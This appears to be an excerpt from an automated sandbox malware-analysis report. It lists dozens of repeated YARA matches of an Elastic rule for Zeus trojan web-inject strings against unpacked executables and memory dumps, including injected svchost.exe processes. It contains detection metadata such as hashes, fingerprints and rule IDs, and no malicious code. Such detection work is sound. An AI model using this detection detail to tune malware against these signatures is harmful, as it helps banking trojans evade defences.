Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.12a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.ae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.f30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.1292000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.12e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.ae0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.6a2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.1282000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.12f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.ed2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.Z8eHwAvqAh.exe.61e4c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.10b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2145950439.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2143582018.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
